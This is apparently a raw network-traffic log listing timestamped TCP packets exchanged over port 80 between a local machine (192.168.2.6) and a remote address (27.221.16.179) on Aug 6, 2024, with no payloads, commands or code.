                                                                                                                                    Aug 6, 2024 10:30:39.994591951 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:39.994607925 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:39.994762897 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.332113981 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332158089 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332189083 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332205057 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332238913 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332263947 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332281113 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332297087 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332314014 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332330942 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332359076 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332372904 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332386017 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332400084 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332415104 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332429886 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332447052 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332457066 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.332464933 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332490921 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332505941 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332498074 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.332515955 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.332530022 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332541943 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332561016 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332564116 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.332573891 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332592964 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332598925 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.332603931 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332617044 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332622051 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.332638025 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332649946 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332659006 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.332663059 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332681894 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.332684040 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332694054 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332710981 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332722902 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332739115 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332751036 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332760096 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.332763910 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332775116 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332787991 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332793951 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.332793951 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.332801104 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.332901955 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.333322048 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.333363056 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.333376884 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.333394051 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.333434105 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.333446980 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.333458900 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.333471060 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.333477020 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.333544016 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.333550930 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.333556890 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.333570004 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.333580971 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.333592892 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.333600998 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.333605051 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.333617926 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.333628893 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.333628893 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.333749056 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.333995104 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.334007978 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.334027052 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.334032059 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.334038019 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.334043980 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.334049940 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.334119081 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.631263018 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631308079 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631321907 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631335974 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631356955 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631371975 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631386042 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631400108 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631417036 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.631418943 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631434917 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631443977 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.631448984 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631469011 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631484032 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631498098 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631500006 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.631510019 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631522894 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.631525040 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631541014 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631556034 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.631589890 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631603956 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631608009 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.631618023 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631625891 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631640911 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631654024 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631665945 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.631675959 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631685972 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.631690025 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631704092 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631720066 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631726027 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.631735086 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631742954 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.631771088 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631784916 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631791115 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.631798983 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631813049 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.631839991 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.631870031 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.632158041 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632172108 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632185936 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632217884 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632230997 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632239103 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.632309914 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632323980 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632333040 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.632338047 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632385969 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.632386923 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.632399082 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632420063 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632433891 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632447004 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632462025 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632476091 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632498980 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.632527113 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.632527113 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.632626057 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632668018 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632682085 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632711887 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632728100 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632736921 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.632742882 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632776976 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632787943 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632798910 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632802963 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.632811069 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632882118 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632889032 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.632894039 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632906914 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632917881 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632930040 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.632952929 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.632983923 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.633203030 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.633239985 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.633258104 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.633260012 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.633275986 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.633285999 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.633299112 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.633326054 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.633327961 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.633341074 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.633352995 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.633405924 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.956150055 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956239939 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956260920 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956273079 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956289053 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956289053 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.956296921 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956301928 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956307888 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956312895 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956319094 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956324100 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956330061 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956335068 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956341028 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956347942 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956446886 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.956476927 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956496000 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956510067 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956513882 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.956522942 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956535101 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956543922 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956556082 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.956578016 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.956912041 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956944942 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956957102 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.956960917 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.956995964 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957024097 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957035065 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957045078 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957055092 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957066059 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957076073 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957087040 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957154036 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957165956 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957180023 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957201004 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957226038 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957392931 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957408905 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957417965 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957427979 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957437992 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957448006 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957451105 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957458973 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957469940 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957479954 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957489014 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957493067 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957504034 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957508087 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957514048 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957524061 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957525015 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957545042 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957603931 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957614899 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957624912 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957637072 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957647085 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957653046 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957664967 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957675934 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957679987 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957686901 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957696915 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957701921 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957703114 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957712889 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957722902 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957727909 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957732916 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957753897 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957756042 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957765102 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957776070 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957778931 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957787037 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957797050 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957803011 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957808018 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957818031 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957823038 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957825899 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957833052 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957843065 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957853079 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.957854986 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957871914 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.957885027 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.958328962 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.958354950 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.958365917 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.958384037 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.958410025 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.958420992 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.958422899 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:40.958431959 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:40.958467007 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:41.005170107 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:41.306432962 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:41.306452036 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:41.306469917 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:41.306490898 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:41.306500912 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:41.306510925 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:41.306516886 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:41.306521893 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:41.306533098 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:41.306544065 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:41.306555033 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:41.306564093 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:41.306566954 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:41.306576014 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:41.306586027 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:41.306596994 CEST804978127.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:41.306602955 CEST4978180192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:41.306616068 CEST4978180192.168.2.627.221.16.179
